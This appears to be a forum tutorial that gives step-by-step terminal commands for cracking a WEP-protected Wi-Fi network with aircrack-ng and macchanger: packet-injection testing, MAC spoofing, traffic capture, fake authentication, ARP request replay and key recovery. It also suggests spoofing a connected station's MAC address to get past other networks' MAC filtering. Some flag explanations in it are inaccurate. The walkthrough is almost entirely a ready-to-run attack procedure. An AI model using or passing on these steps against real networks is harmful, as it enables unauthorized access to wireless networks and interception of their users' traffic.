What is WEP?
Wired Equivalent Privacy (WEP) is a security protocol for wireless networks that encrypts transmitted data . It's easy to configure. Without any security your data can be intercepted without difficulty.
Please do not confuse this with WPA, WPA is Wi-Fi Protected Access, a security standard for wireless networks. This requires a password, NOT a key.
1) Can you even do it?
First we need to be sure your wireless card can support packet injection. I used my Acer Aspire 5920. It comes with a 802. 11a/b/g WLAN Wireless card. It cant do packet injection. Thus I purchased the Hawking HWUG1 Wireless card. Hard to come by, but one of the best out there. Best buy has them for $40, give or take.
2) Install the software
Some people like to use BackTrack Live OS, which to me, is pointless, unless you dont want to install linux and use it as your everyday running operating system. You need 2 things to do this, macchanger, and aircrack-ng
Commands:
Make yourself the root user:
[QUOTE]sudo -s[/QUOTE]
Install Aircrack
[QUOTE]apt-get install aircrack-ng[/QUOTE]
Install macchanger
[QUOTE]apt-get install macchanger[/QUOTE]
There! You have the 2 programs that make it easy to continue.
3) Verify you can use injection
Open the terminal, and type iwconfig. It will show you your network cards.
You will see I have 2 wireless cards. wlan0 and rausb0, wlan0 is what wont work, so we need to disable that, rausb0 is the wireless card I purchased.
Type the following command:
[QUOTE]aireplay-ng --test rausb0[/QUOTE]
That will show the following result.
If it doesnt, you need to get a wireless card that works.
4) Spoof mac and put your wireless card into monitor mode
I will list the commands, and what they do. You dont NEED to spoof your mac, but it sure makes it a lot easier to remember.
We dont need wlan0, so lets disable it.
[QUOTE]ifconfig wlan0 down[/QUOTE]
We need to disable rausb0 as well, so we can modify it
[QUOTE]ifconfig rausb0 down[/QUOTE]
Change your mac (can be whatever you want as long as it looks like ##:##:##:##:##:##)
[QUOTE]macchanger --mac 00:11:22:33:44:55 rausb0[/QUOTE]
The below commands are used for the hawking wireless card only, I believe they enable the drivers for the wireless card
[QUOTE]modprobe -r rt73
modprobe rt73[/QUOTE]
Bring up rausb0 for use
[QUOTE]ifconfig rausb0 up[/QUOTE]
Modify the bit rate of rausb0 to 1Mb/s
[QUOTE]iwconfig rausb0 rate 1M[/QUOTE]
confirm the bit rate
[QUOTE]iwconfig rausb0[/QUOTE]
Enable rausb0 for use
[QUOTE]airmon-ng start rausb0[/QUOTE]
Here is a screenshot of me doing all of that (dont mind the typo)
You are now ready to begin!
5) Monitor the wireless networks around you, choose your target
Type the following command into your terminal
[QUOTE]airodump-ng rausb0[/QUOTE]
This will monitor the wireless networks around you, as well as the stations connected to them.
You will notice the command will display pretty much everything you need. We will attack 2WIRE (my wireless lan). Notice its WEP, and its on channel 6. I have highlighted the BSSID.
NOTE: Looking at the screenshot, you will notice it shows the stations connected to BSSID's, this is why mac filtering is pointless, if they can connect, and you cant, spoof your mac to theres, and chances are it will let you in. If the station's connected BSSID is blank, that means hes looking or trying to connect to a BSSID, but has not yet.
6) Run Airodump-ng
Once you have selected your target, you can monitor the data packets it is sending out.
Type the below command into the terminal.
[QUOTE]airodump-ng -c 6 -w 2wire --bssid 00:12:88:FE:7A:21 rausb0[/QUOTE]
-c will specify the channel the BSSID is on, 2WIRE is on 6
-w will write the packet data to a file, I chose to name the file 2wire
--bssid will specify the BSSID you are trying to connect to.
NOTE: LEAVE THIS RUNNING! Open a new terminal tab, and sudo -s again as admin
Notice how the Data column says 0? It will climb to 5000 to 10000 packets, if you cant even hit 5000, then your signal isnt good enough. This may take time, it can take anywhere from 2 minutes to 30 minutes. Be patient.
7) Fake Authentication with Access Point
Type the below command in the terminal
[QUOTE]aireplay-ng -1 0 -a 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
-a forces attack mode
-h is the host, that is your mac
The authentication must read successful in order for you to continue, I have had to run this command a few times to get it to be successful.
8) Run Aireplay with -3 (start aireplay-ng in ARP Request Replay Mode)
Type the below command into the terminal:
[QUOTE]aireplay-ng -3 -b 00:12:88:FE:7A:21 -h 00:11:22:33:44:55 rausb0[/QUOTE]
NOTE: Open a new tab again! Let this run as well!!
9) LAST STEP! Decrypt the packet data
if you go into the terminal and type "ls /home", you will see some .cap files, i named my log 2wire, thus it will be "2wire-01.cap"
Type the following command into the terminal:
[QUOTE]aircrack-ng -n 64 --bssid 00:12:88:FE:7A:21 2wire-01.cap[/QUOTE]
Hope it has enough data to decrypt, if not, it will say please wait and try later.
SUCCESS!
Answered
